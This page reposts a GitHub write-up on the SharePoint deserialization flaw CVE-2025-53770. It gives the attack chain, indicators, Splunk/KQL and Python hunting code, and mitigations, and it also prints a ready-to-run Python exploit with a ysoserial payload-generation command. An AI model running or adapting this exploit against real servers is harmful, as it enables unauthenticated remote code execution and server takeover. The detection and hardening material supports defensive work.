Microsoft SharePoint Deserialization Vulnerability

Vulnerability Information

Vulnerability name: Microsoft SharePoint Deserialization Vulnerability

Vulnerability IDs:

  • CVE: CVE-2025-53770

Vulnerability type: Deserialization

Severity: Critical

Vulnerability description: Microsoft SharePoint is a widely used enterprise collaboration platform that supports document management, team collaboration and business process automation. It is usually deployed on internal corporate networks, but it may also be exposed to the internet. CVE-2025-53770 is a zero-day remote code execution vulnerability affecting on-premises editions of SharePoint Server. It stems from unsafe deserialization of __VIEWSTATE data in the ToolPane.aspx component; combined with the referer-spoofing flaw CVE-2025-53771, an attacker can achieve remote code execution without authentication by sending a specially crafted HTTP POST request. An attacker can use this to run arbitrary code on the target server, obtain system privileges, upload a web shell, move laterally and steal data. Because the vulnerability has been exploited in the wild, has low attack complexity and affects a wide range of deployments, it is rated critical. Microsoft has released patches; users are advised to update immediately and take additional measures such as rotating machine keys and restricting access to ToolPane.aspx.

Vendor: Microsoft

Product: SharePoint Server

Affected versions: SharePoint Server 2016 (before KB5002760), SharePoint Server 2019 (before KB5002754), SharePoint Subscription Edition (before KB5002768)

Source: https://github.com/Kamal-Hegazi/CVE-2025-53770-SharePoint-RCE

Type: CVE-2025:github search

Repository files

  • README.md
  • poc.py

Source overview

CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers

Overview

In mid‑July 2025, Microsoft disclosed CVE‑2025‑53770, a zero‑day remote code execution vulnerability in on‑premises SharePoint. This flaw, when chained with CVE‑2025‑53771, enables unauthenticated attackers to fully compromise vulnerable servers over the internet.

The exploitation campaign, dubbed “ToolShell”, has been observed actively targeting governments, energy, education, and telecom sectors worldwide. If you run SharePoint Server (2016/2019/Subscription) and expose it to the internet, you need to patch now.

Impact at a glance

  • Attack Vector: Remote, unauthenticated
  • Impact: Full RCE (IIS worker context)
  • Exploitation: Active (confirmed by MS + CISA)
  • Ease: Exploitable with a single HTTP POST

Vulnerability Details

The issue lies in unsafe deserialization of crafted __VIEWSTATE data in the ToolPane.aspx component. When combined with a referer spoof (CVE‑2025‑53771), attackers can reach this endpoint without authentication, feed it a malicious payload, and gain remote code execution as the w3wp.exe (IIS worker) process.

The attack chain:

  1. Authentication bypass: Use Referer: /_layouts/SignOut.aspx to bypass security checks on /_layouts/15/ToolPane.aspx?DisplayMode=Edit.
  2. Malicious ViewState: Send a signed or forged ViewState payload containing serialized gadget chains (crafted via tools like ysoserial.net).
  3. RCE: SharePoint deserializes the payload and executes attacker‑controlled code.
  4. Persistence: Attackers drop a web shell (e.g., spinstall0.aspx) and steal machine keys for future signed payload generation.

Visualized:

[ Attacker ]
|
v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
|
v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
|
v
[ RCE: Attacker code runs as w3wp.exe ]

Why It Matters

  • No authentication required: Works from the internet if the server is exposed.
  • Full takeover: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.
  • Exploited in the wild: Microsoft, CISA, and Rapid7 have confirmed active exploitation in multiple regions.

Affected Versions

  • SharePoint Server 2016 (before KB5002760)
  • SharePoint Server 2019 (before KB5002754)
  • SharePoint Subscription Edition (before KB5002768)

(SharePoint Online is not affected.)


Indicators of Compromise

  • Requests to:
    /_layouts/15/ToolPane.aspx?DisplayMode=Edit
    with Referer: /_layouts/SignOut.aspx.
  • Dropped files:
    spinstall0.aspx
    spinstall1.aspx
  • Suspicious process chains:
    w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
  • Known attacker IPs:
    107.191.58.76, 104.238.159.149, 96.9.125.147

Detection & Hunting

Splunk (IIS Logs)

index=iis sourcetype="ms:iis:auto"
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time

KQL (Microsoft Sentinel)

W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, userAgent, TimeGenerated
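The Splunk and KQL searches above express the hunt for a SIEM; the following added example (written for this page, not part of the original repository) applies the same ToolPane.aspx + SignOut.aspx referer logic, together with the web-shell filename and oversized-POST indicators from the IoC and mitigation sections, to raw IIS W3C log lines offline. The log records are constructed samples, and the 4096-byte POST threshold is an assumed tuning value.

```python
import re
from typing import Dict, Iterator, List

# Constructed sample IIS W3C log (not from a real server). IIS writes spaces
# inside a field as '+', so whitespace splitting is safe.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken cs-bytes
2025-07-19 10:01:02 10.0.0.5 GET /_layouts/15/start.aspx - 443 alice 10.0.1.20 Mozilla/5.0+(Windows+NT+10.0) https://sp.example.internal/ 200 0 0 120 512
2025-07-19 10:02:15 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 - 198.51.100.23 python-requests/2.31.0 /_layouts/SignOut.aspx 200 0 0 340 7421
2025-07-19 10:02:16 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 198.51.100.23 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 15 300
2025-07-19 10:03:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 bob 10.0.1.21 Mozilla/5.0+(Windows+NT+10.0) https://sp.example.internal/sites/hr/_layouts/15/ToolPane.aspx 200 0 0 200 900
"""

TOOLPANE = "/_layouts/15/toolpane.aspx"
SIGNOUT = "/_layouts/signout.aspx"
WEBSHELL_RE = re.compile(r"/spinstall\d*\.aspx$")  # spinstall0.aspx, spinstall1.aspx, ...


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, keyed by the names in the most recent #Fields header."""
    fields: List[str] = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
        elif raw and not raw.startswith("#"):
            values = raw.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))


def hunt_iis_log(text: str, max_post_bytes: int = 4096) -> List[Dict[str, str]]:
    """Return one finding per matched rule; max_post_bytes is an assumed tuning value."""
    findings: List[Dict[str, str]] = []

    def flag(rule: str, rec: Dict[str, str]) -> None:
        findings.append({"rule": rule, "client": rec["c-ip"],
                         "time": f'{rec["date"]} {rec["time"]}', "uri": rec["cs-uri-stem"]})

    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        referer = rec.get("cs(Referer)", "-").lower()
        size = rec.get("cs-bytes", "0")
        if stem.endswith(TOOLPANE):
            # Rule 1: the CVE-2025-53771 bypass leaves the SignOut.aspx referer in the log.
            if referer.endswith(SIGNOUT):
                flag("toolpane-signout-referer", rec)
            # Rule 2: an oversized POST body to ToolPane.aspx suggests a gadget-chain ViewState.
            if rec["cs-method"] == "POST" and size.isdigit() and int(size) > max_post_bytes:
                flag("toolpane-large-post", rec)
        # Rule 3: any request for the dropped web-shell file names.
        if WEBSHELL_RE.search(stem):
            flag("webshell-request", rec)
    return findings
```

Run hunt_iis_log over a real log file's contents to get a list of findings keyed by rule, client IP, time and URI; the legitimate internal ToolPane.aspx request from "bob" in the sample produces no finding.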

Proof‑of‑Concept (Python)

Below is a ready‑to‑run PoC. The only thing you need to change is the TARGET variable.

#!/usr/bin/env python3
# CVE-2025-53770 – SharePoint Unauthenticated RCE PoC
# Author: 0xH3G4Z1
# Usage: python3 exploit.py

import requests
import urllib3

urllib3.disable_warnings()

# === CONFIG ===
TARGET = "https://your-sharepoint-server"  # <--- CHANGE THIS ONLY
ENDPOINT = "/_layouts/15/ToolPane.aspx?DisplayMode=Edit"
FULL_URL = TARGET.rstrip("/") + ENDPOINT

# Pre-built harmless ViewState payload (for PoC demonstration)
VIEWSTATE_PAYLOAD = (
    "/wEWBwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3"
    "AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTx"
    "Jm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3Aw"
)

HEADERS = {
    "Referer": "/_layouts/SignOut.aspx",
    "Content-Type": "application/x-www-form-urlencoded"
}

DATA = {
    "__VIEWSTATE": VIEWSTATE_PAYLOAD,
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": ""
}


def exploit():
    print(f"[+] Sending payload to {FULL_URL}")
    try:
        r = requests.post(FULL_URL, headers=HEADERS, data=DATA, verify=False, timeout=10)
        print(f"[+] Response: {r.status_code} ({len(r.content)} bytes)")
        if r.status_code == 200:
            print("[+] If vulnerable, the payload was processed (check your target).")
        elif r.status_code == 403:
            print("[-] Access forbidden (patched or blocked).")
        else:
            print("[-] Exploit may not have succeeded.")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    exploit()

Generating a payload:

ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c "cmd /c calc.exe" > payload.txt

Then replace __VIEWSTATE with the contents of payload.txt.


Mitigation & Hardening

  1. Patch immediately:
  2. Rotate machine keys (twice): Update the machineKey in web.config to invalidate stolen signing keys.
  3. Restrict access to /_layouts/15/ToolPane.aspx to internal networks only.
  4. Enable IIS request filtering to block oversized or suspicious ViewState payloads.
  5. Enable Defender AV + AMSI integration for real‑time scanning of SharePoint components.
  6. Hunt for compromise: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.

Key Takeaways

  • CVE‑2025‑53770 is being actively exploited.
  • The attack is trivial once discovered (POST + spoofed Referer).
  • Patching alone is not enough — rotate machine keys to invalidate stolen ViewState signing keys.
  • Monitor for web shells (spinstall0.aspx, etc.) and suspicious ToolPane.aspx requests.

http://example.com/2025/07/23/github_2402498289/
Author
lianccc
Published
July 23, 2025
License